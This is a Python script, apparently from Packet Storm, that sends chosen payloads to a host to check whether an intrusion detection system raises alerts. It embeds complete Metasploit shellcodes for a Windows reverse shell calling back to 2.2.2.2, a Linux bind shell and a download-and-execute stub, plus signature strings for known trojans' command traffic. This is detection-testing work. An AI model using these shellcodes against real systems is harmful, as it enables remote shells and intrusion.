PZIDS (Peta Zetas IDS) is a tool to test if your IDS is detecting threats properly. Written in Python.
782a38ad56fd8b478a46cd9fec2b164e0e758d8def1fc0aeb7f24a95cc747b14#!/usr/bin/env python
# PZIDS (Peta Zetas IDS)
#
# pzids is a tool to test if your IDS
# is detecting threats properly.
#
# It includes some attack simulations
# from the inside and the outside that
# should match with your signatures.
#
# The name is taken from a well-known
# candy commercialized in Spain.
#
# GNU/GPLv3
# a0rtega
import sys
import socket
if (len(sys.argv) != 4):
print "PZIDS (Peta Zetas IDS) Help"
print "%s host port payload" % (sys.argv[0])
print "%s 127.0.0.1 80 1\n" % (sys.argv[0])
print "Payloads:\n"
print "$EXTERNAL_NET any -> $HOME_NET any"
print " 1 (Snort - SHELLCODE x86 NOOP)"
print " 2 (Snort - SHELLCODE x86 setuid 0)"
print " 3 (Snort - SHELLCODE x86 Windows 32-bit SEH get EIP technique)"
print " 4 (Snort - SHELLCODE x86 Linux reverse connect shellcode)"
print " 5 (Snort - SHELLCODE x86 inc ecx NOOP)"
print " 6 (MSF - windows/shell_reverse_tcp)"
print " 7 (MSF - linux/x86/shell_bind_tcp)"
print " 8 (MSF - windows/download_exec)"
print "\n",
print "$HOME_NET any -> $EXTERNAL_NET any"
print " a (Snort - ATTACK-RESPONSES directory listing)"
print " b (Snort - SPYWARE-PUT Keylogger ardamax keylogger runtime detection - ftp)"
print " c (Snort - BACKDOOR bandook 1.0 runtime detection)"
print " d (Emerging-threats - ET TROJAN IMDDOS Botnet User-Agent STORMDDOS)"
print " e (Emerging-threats - ET TROJAN Gh0st Trojan CnC)"
print " f (Emerging-threats - ET TROJAN NgrBot IRC CnC Channel Join)"
print " g (Emerging-threats - ET TROJAN Zeus/EyeStye Communication 0)"
sys.exit(0)
# From outside signatures
snort_shell_x86_noop = '\x90'*100
snort_shell_x86_setuid = "\xB0\x17\xCD\x80"
snort_shell_x86_win_seh_eip = "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
snort_shell_x86_linux_reverse = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80"
snort_shell_x86_inc_ecx_noop = 'A'*100
'''
* windows/shell_reverse_tcp - 314 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=2.2.2.2, LPORT=666,
* ReverseConnectRetries=5, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
'''
msf_shell_reverse_tcp = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" \
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" \
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" \
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" \
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" \
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" \
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" \
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" \
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" \
"\x68\x02\x02\x02\x02\x68\x02\x00\x02\x9a\x89\xe6\x6a\x10\x56" \
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" \
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" \
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56" \
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" \
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" \
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80" \
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
'''
* linux/x86/shell_bind_tcp - 78 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
'''
msf_shell_bind_tcp = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" \
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" \
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" \
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" \
"\x0b\xcd\x80"
'''
* windows/download_exec - 359 bytes
* http://www.metasploit.com
* VERBOSE=false, URL=http://example.com/
'''
msf_down_exec = "\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2" \
"\xfa\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd" \
"\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91" \
"\x12\x41\x12\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a" \
"\x62\x12\xd7\x8d\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b" \
"\xf3\x97\xc0\x6a\x3f\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70" \
"\xc0\xc6\xc7\x12\x54\x12\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa" \
"\x50\xff\x12\x91\x12\xdf\x85\x9a\x5a\x58\x78\x9b\x9a\x58\x12" \
"\x99\x9a\x5a\x12\x63\x12\x6e\x1a\x5f\x97\x12\x49\xf3\x9d\xc0" \
"\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb\xcf\x66\xce\x65\xc3\x12" \
"\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a\x5f\x8a\xcf\xdf\x19" \
"\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9\x12\x45\xf3\xb9" \
"\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e\xdd\x9a\x9d" \
"\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce\x65\x12" \
"\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c\x59" \
"\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59" \
"\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd" \
"\xfd\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4" \
"\xdd\xf0\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc" \
"\xe1\xfc\xfa\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99" \
"\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb" \
"\xf5\xf4\xf6\xf7\x99\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8" \
"\xfd\xcd\xf6\xdf\xf0\xf5\xfc\xd8\x99\x68\x74\x74\x70\x3a\x2f" \
"\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x2f\x80"
# To outside signatures
snort_att_resp_dir_list = "Volume Serial Number"
snort_spy_keylogg_ardamax = "{D082139B-D5E4-4e63-B866-9BFC97880A48}"
snort_back_bandook = "&first& "
et_trojan_imddos = "GET / HTTP/1.1\x0D\x0AHost: randomhost:1234\x0D\x0AConnection: keep-alive\x0D\x0A" \
"User-Agent: STORMDDOS\x0D\x0A\x0D\x0A"
et_trojan_gh0st = "Gh0st"
et_trojan_ngrbot = "PASS ngrBot"
et_trojan_zeus_eyestye = "AAAAA\xB4\xB4\xB4\xB4\xBC\xBF\xBF\xBF\xBF\xBD\xBD\xBD\xBD\xB3\xB3\xB3\xB3"
# Run
host = sys.argv[1]
port = sys.argv[2]
payload = sys.argv[3]
if payload == "1":
buff = snort_shell_x86_noop
elif payload == "2":
buff = snort_shell_x86_setuid
elif payload == "3":
buff = snort_shell_x86_win_seh_eip
elif payload == "4":
buff = snort_shell_x86_linux_reverse
elif payload == "5":
buff = snort_shell_x86_inc_ecx_noop
elif payload == "6":
buff = msf_shell_reverse_tcp
elif payload == "7":
buff = msf_shell_bind_tcp
elif payload == "8":
buff = msf_down_exec
elif payload == "a":
buff = snort_att_resp_dir_list
elif payload == "b":
buff = snort_spy_keylogg_ardamax
elif payload == "c":
buff = snort_back_bandook
elif payload == "d":
buff = et_trojan_imddos
elif payload == "e":
buff = et_trojan_gh0st
elif payload == "f":
buff = et_trojan_ngrbot
elif payload == "g":
buff = et_trojan_zeus_eyestye
else:
print "Error: Unknown payload."
sys.exit(1)
try:
print "Connecting ..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
print "Sending payload ..."
s.send(buff)
s.close()
print "Sent!"
except:
print "Error: Unable to connect to %s:%s" % (host, port)
sys.exit(1)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed